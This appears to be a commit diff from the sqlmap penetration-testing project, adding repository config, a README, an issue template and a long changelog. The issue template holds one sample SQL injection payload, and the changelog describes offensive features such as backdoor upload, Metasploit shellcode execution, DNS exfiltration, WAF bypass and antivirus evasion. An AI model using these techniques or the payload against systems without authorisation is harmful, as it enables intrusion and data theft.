Minor touch for internal re-hashing purposes

Added identification for waf NAXSI

.gitattributes

@@ -0,0 +1,17 @@
+*.conf text eol=lf
+*.md text eol=lf
+*.md5 text eol=lf
+*.py text eol=lf
+*.xml text eol=lf
+
+*_ binary
+*.dll binary
+*.pdf binary
+*.so binary
+*.wav binary
+*.zip binary
+*.x32 binary
+*.x64 binary
+*.exe binary
+*.sln binary
+*.vcproj binary

.gitignore

@@ -0,0 +1,6 @@
+*.py[cod]
+output/
+.sqlmap_history
+traffic.txt
+*~
+.idea/

.travis.yml

@@ -0,0 +1,6 @@
+language: python
+python:
+    - "2.6"
+    - "2.7"
+script:
+    - python -c "import sqlmap; import sqlmapapi"

ISSUE_TEMPLATE.md

@@ -0,0 +1,26 @@
+## What's the problem (or question)?
+<!--- If describing a bug, tell us what happens instead of the expected behavior -->
+<!--- If suggesting a change/improvement, explain the difference from current behavior -->
+
+## Do you have an idea for a solution?
+<!--- Not obligatory, but suggest a fix/reason for the bug, -->
+<!--- or ideas how to implement the addition or change -->
+
+## How can we reproduce the issue?
+<!--- Provide unambiguous set of steps to reproduce this bug. Include command to reproduce, if relevant (you can mask the sensitive data) -->
+1.
+2.
+3.
+4.
+
+## What are the running context details?
+<!--- Include as many relevant details about the running context you experienced the bug/problem in -->
+* Installation method (e.g. `pip`, `apt-get`, `git clone` or `zip`/`tar.gz`):
+* Client OS (e.g. `Microsoft Windows 10`)
+* Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): 
+* Target DBMS (e.g. `Microsoft SQL Server`): 
+* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`):
+* SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`):
+* Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works):
+* Relevant console output (if any):
+* Exception traceback (if any):

README.md

@@ -0,0 +1,66 @@
+# sqlmap
+
+[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
+
+sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
+
+Screenshots
+----
+
+![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
+
+You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki.
+
+Installation
+----
+
+You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking  [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform.
+
+Usage
+----
+
+To get a list of basic options and switches use:
+
+    python sqlmap.py -h
+
+To get a list of all options and switches use:
+
+    python sqlmap.py -hh
+
+You can find a sample run [here](https://asciinema.org/a/46601).
+To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Links
+----
+
+* Homepage: http://sqlmap.org
+* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
+* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
+
+Translations
+----
+
+* [Bulgarian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-bg-BG.md)
+* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md)
+* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md)
+* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
+* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
+* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
+* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
+* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
+* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
+* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)

doc/AUTHORS

@@ -1,7 +1,7 @@
-Bernardo Damele Assumpcao Guimaraes (inquis) - Lead developer
-<bernardo.damele@gmail.com>
-PGP Key ID: 0x05F5A30F
+Bernardo Damele Assumpcao Guimaraes (@inquisb)
+<bernardo@sqlmap.org>
 
-Miroslav Stampar (stamparm) - Developer since version 0.8-rc2
-<miroslav.stampar@gmail.com>
-PGP Key ID: 0xB5397B1B
+Miroslav Stampar (@stamparm)
+<miroslav@sqlmap.org>
+
+You can contact both developers by writing to dev@sqlmap.org

doc/CHANGELOG.md

@@ -0,0 +1,368 @@
+# Version 1.0 (2016-02-27)
+
+* Implemented support for automatic decoding of page content through detected charset.
+* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.).
+* Major improvements to program stabilization based on user reports.
+* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms.
+* Fixed major bug with DNS leaking in Tor mode.
+* Added wordlist compilation made of the most popular cracking dictionaries.
+* Implemented multi-processor hash cracking routine(s).
+* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method.
+* Old resume files are now deprecated and replaced by faster SQLite based session mechanism.
+* Substantial code optimization and smaller memory footprint.
+* Added option `-m` for scanning multiple targets enlisted in a given textual file.
+* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form.
+* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests.
+* Added option `--host` for manually setting HTTP Host header value.
+* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself.
+* Added option `--skip` for skipping tests for given parameter(s).
+* Added switch `--titles` for comparing pages based only on their titles.
+* Added option `--charset` for forcing character encoding used for data retrieval.
+* Added switch `--check-tor` for checking if Tor is used properly.
+* Added option `--crawl` for multithreaded crawling of a given website starting from the target url.
+* Added option `--csv-del` for manually setting delimiting character used in CSV output.
+* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval.
+* Added switch `--smart` for conducting through tests only in case of positive heuristic(s).
+* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection.
+* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables.
+* Added switch `--count` to count the number of entries for a specific table or all database(s) tables.
+* Major improvements to switches `--tables` and `--columns`.
+* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof.
+* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header.
+* Added switch `-a` to enumerate all DBMS data.
+* Added option `--alert` to run host OS command(s) when SQL injection is found.
+* Added option `--answers` to set user answers to asked questions during sqlmap run.
+* Added option `--auth-file` to set HTTP authentication PEM cert/private key file.
+* Added option `--charset` to force character encoding used during data retrieval.
+* Added switch `--check-tor` to force checking of proper usage of Tor.
+* Added option `--code` to set HTTP code to match when query is evaluated to True.
+* Added option `--cookie-del` to set character to be used while splitting cookie values.
+* Added option `--crawl` to set the crawling depth for the website starting from the target URL.
+* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`).
+* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token.
+* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token.
+* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`).
+* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password).
+* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies.
+* Added switch `--disable-coloring` to disable console output coloring.
+* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s).
+* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`).
+* Added option `--eval` for setting the Python code that will be evaluated before the request.
+* Added switch `--force-ssl` to force usage of SSL/HTTPS.
+* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval.
+* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`).
+* Added switch `-hh` for showing advanced help message.
+* Added option `--host` to set the HTTP Host header value.
+* Added switch `--hostname` to turn on retrieval of DBMS server hostname.
+* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method.
+* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection.
+* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized).
+* Added switch `--invalid-bignum` for usage of big numbers while invalidating values.
+* Added switch `--invalid-logical` for usage of logical operations while invalidating values.
+* Added switch `--invalid-string` for usage of random strings while invalidating values.
+* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format.
+* Added option `-m` to set the textual file holding multiple targets for scanning purposes.
+* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`).
+* Added switch `--no-cast` for turning off payload casting mechanism.
+* Added switch `--no-escape` for turning off string escaping mechanism.
+* Added option `--not-string` for setting string to be matched when query is evaluated to False.
+* Added switch `--offline` to force work in offline mode (i.e. only use session data).
+* Added option `--output-dir` to set custom output directory path.
+* Added option `--param-del` to set character used for splitting parameter values.
+* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing).
+* Added option `--proxy-file` to set file holding proxy list.
+* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory.
+* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run.
+* Added option `--safe-post` to set POST data for sending to safe URL.
+* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL.
+* Added option `--skip` to skip testing of given parameter(s).
+* Added switch `--skip-static` to skip testing parameters that not appear to be dynamic.
+* Added switch `--skip-urlencode` to skip URL encoding of payload data.
+* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection.
+* Added switch `--smart` to conduct thorough tests only if positive heuristic(s).
+* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi).
+* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt.
+* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`).
+* Added option `--test-skip` for skipping tests by payloads and/or titles (e.g. `BENCHMARK`).
+* Added switch `--titles` to turn on comparison of pages based only on their titles.
+* Added option `--tor-port` to explicitly set Tor proxy port.
+* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`).
+* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection.
+* Added option `--where` to set `WHERE` condition to be used during the table dumping.
+* Added option `-X` to exclude DBMS database table column(s) from enumeration.
+* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing.
+* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`).
+
+# Version 0.9 (2011-04-10)
+
+* Rewritten SQL injection detection engine.
+* Support to directly connect to the database without passing via a SQL injection, option `-d`.
+* Added full support for both time-based blind SQL injection and error-based SQL injection techniques.
+* Implemented support for SQLite 2 and 3.
+* Implemented support for Firebird.
+* Implemented support for Microsoft Access, Sybase and SAP MaxDB.
+* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`.
+* Added support to tamper injection data with option `--tamper`.
+* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack.
+* Added support to enumerate roles on Oracle, `--roles` switch.
+* Added support for SOAP based web services requests.
+* Added support to fetch unicode data.
+* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`.
+* Implemented several optimization switches to speed up the exploitation of SQL injections.
+* Support to test and inject against HTTP Referer header.
+* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`.
+* Implemented feature to speedup the enumeration of table names.
+* Support for customizable HTTP(s) redirections.
+* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`.
+* Support to parse and test forms on target url, switch `--forms`.
+* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL.
+* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection.
+* Added safe URL feature, `--safe-url` and `--safe-freq`.
+* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content.
+* Implemented few other features and switches.
+* Over 100 bugs fixed.
+* Major code refactoring.
+* User's manual updated.
+
+# Version 0.8 (2010-03-14)
+
+* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials.
+* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table.
+* Support for takeover features on PostgreSQL 8.4.
+* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows.
+* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root.
+* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries.
+* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function.
+* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5.
+* Updated active fingerprint for PostgreSQL 8.4.
+* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`.
+* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses.
+* Support for Certificate authentication, `--auth-cert` option added.
+* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`.
+* Added option `-r` to load a single HTTP request from a text file.
+* Added switch `--ignore-proxy` to ignore the system default HTTP proxy.
+* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`.
+* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`.
+* Major bug fix and enhancements to the multi-threading (`--threads`) functionality.
+* Fixed URL encoding/decoding of GET/POST parameters and Cookie header.
+* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository.
+* Major bugs fixed.
+* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack.
+* Major code cleanup.
+* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus software that mistakenly mark sqlmap as a malware.
+* Updated user's manual.
+* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html.
+
+# Version 0.8 release candidate (2009-09-21)
+
+* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection.
+* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable.
+* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys.
+* Added options for MySQL and PostgreSQL to inject custom user-defined functions.
+* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output.
+* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified.
+* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system.
+* Minor bugs fixed.
+* Major code refactoring.
+
+# Version 0.7 (2009-07-25)
+
+* Adapted Metasploit wrapping functions to work with latest 3.3 development version too.
+* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too.
+* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too.
+* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=).
+* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+.
+* Major bug fix to sql-query/sql-shell features.
+* Major bug fix in `--read-file` option.
+* Major silent bug fix to multi-threading functionality.
+* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided.
+* Fixed MySQL 'comment injection' version fingerprint.
+* Fixed basic Microsoft SQL Server 2000 fingerprint.
+* Many minor bug fixes and code refactoring.
+
+# Version 0.7 release candidate (2009-04-22)
+
+* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server;
+* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux;
+* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support;
+* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit;
+* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server;
+* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable;
+* Speed up the inference algorithm by providing the minimum required charset for the query output;
+* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little;
+* Many minor bug fixes, minor enhancements and layout adjustments.
+
+# Version 0.6.4 (2009-02-03)
+
+* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object;
+* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology;
+* Major speed increase in DBMS basic fingerprint;
+* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator;
+* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing;
+* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment;
+* Minor layout adjustment to the `--update` output;
+* Increased default timeout to 30 seconds;
+* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle;
+* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable;
+* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server;
+* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided;
+* Updated documentation.
+
+# Version 0.6.3 (2008-12-18)
+
+* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l <filepath>;
+* Major enhancement to support Partial UNION query SQL injection technique too;
+* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality;
+* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`;
+* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers;
+* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided;
+* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher;
+* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`;
+* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user;
+* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle;
+* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content;
+* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set;
+* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords;
+* Minor improvements to sqlmap Debian package files;
+* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations;
+* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url;
+* Major bug fix to correctly enumerate columns on Microsoft SQL Server;
+* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified;
+* Minor bug fix to correctly dump table entries when the column is provided;
+* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests;
+* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread;
+* Increased default output level from 0 to 1;
+* Updated documentation.
+
+# Version 0.6.2 (2008-11-02)
+
+* Major bug fix to correctly dump tables entries when `--stop` is not specified;
+* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0;
+* Major bug fix when the request is POST to also send the GET parameters if any have been provided;
+* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`;
+* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file;
+* Minor bug fix in MySQL comment injection fingerprint technique;
+* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database;
+* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided;
+* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3;
+* More user-friendly warning messages.
+
+# Version 0.6.1 (2008-08-20)
+
+* Major bug fix to blind SQL injection bisection algorithm to handle an exception;
+* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
+* Implemented possibility to test for and inject also on LIKE statements;
+* Implemented `--start` and `--stop` options to set the first and the last table entry to dump;
+* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool;
+* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes;
+* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore;
+* Minor bug fix to correctly handle parameters' value with `%` character.
+
+# Version 0.6 (2008-09-01)
+
+* Complete code refactor and many bugs fixed;
+* Added multithreading support to set the maximum number of concurrent HTTP requests;
+* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack;
+* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator;
+* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file;
+* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option;
+* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages;
+* Created sqlmap .exe (Windows) portable executable;
+* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times;
+* Improved automatic check for parenthesis when testing and forging SQL query vector;
+* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable;
+* Implemented support for HTTPS requests over HTTP(S) proxy;
+* Added a check to handle NULL or not available queries output;
+* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks;
+* Improved XML files structure;
+* Implemented the possibility to change the HTTP Referer header;
+* Added support to resume from session file also when running with inband SQL injection attack;
+* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root;
+* Added a check to assure that the provided string to match (`--string`) is within the page content;
+* Fixed various queries in XML file;
+* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it;
+* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function;
+* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable;
+* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic;
+* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires;
+* Added support to inject also on Set-Cookie parameters;
+* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`;
+* Renamed some command line options;
+* Added a conversion library;
+* Added code schema and reminders for future developments;
+* Added Copyright comment and $Id$;
+* Updated the command line layout and help messages;
+* Updated some docstrings;
+* Updated documentation files.
+
+# Version 0.5 (2007-11-04)
+
+* Added support for Oracle database management system
+* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins;
+* Added support to extract database users password hash on Microsoft SQL Server;
+* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting;
+* Added support for SQL injection on HTTP Cookie and User-Agent headers;
+* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Split getValue() into getInband() and getBlind();
+* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack;
+* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables;
+* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`);
+* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default;
+* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml;
+* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped;
+* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py;
+* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`);
+* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces;
+* More minor layout enhancements in some libraries;
+* Renamed DMBS plugins;
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Updated all documentation files.
+
+# Version 0.4 (2007-06-15)
+
+* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS;
+* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS;
+* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`);
+* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`);
+* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation <http://sqlmap.org/dev/>;
+* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS;
+* Improved logging functionality: passed from banal 'print' to Python native logging library;
+* Added support for more than one parameter in `-p` command line option;
+* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`);
+* Added the command line option `--remote-dbms` to manually specify the remote DBMS;
+* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements;
+* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`);
+* Added support to specify the database table column to enumerate (`-C COL`);
+* Added inband SQL injection (UNION query) support (`--union-use`);
+* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements;
+* Reviewed the directory tree structure;
+* Split lib/common.py: inband injection functionalities now are moved to lib/union.py;
+* Updated documentation files.
+
+# Version 0.3 (2007-01-20)
+
+* Added module for MS SQL Server;
+* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check;
+* Added PostgreSQL dbms active fingerprint;
+* Added support for string match (`--string`);
+* Added support for UNION check (`--union-check`);
+* Removed duplicated code, delegated most of features to the engine in common.py and option.py;
+* Added support for `--data` command line argument to pass the string for POST requests;
+* Added encodeParams() method to encode url parameters before making http request;
+* Many bug fixes;
+* Rewritten documentation files;
+* Complete code restyling.
+
+# Version 0.2 (2006-12-13)
+
+* complete refactor of entire program;
+* added TODO and THANKS files;
+* added some papers references in README file;
+* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header;
+* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions;
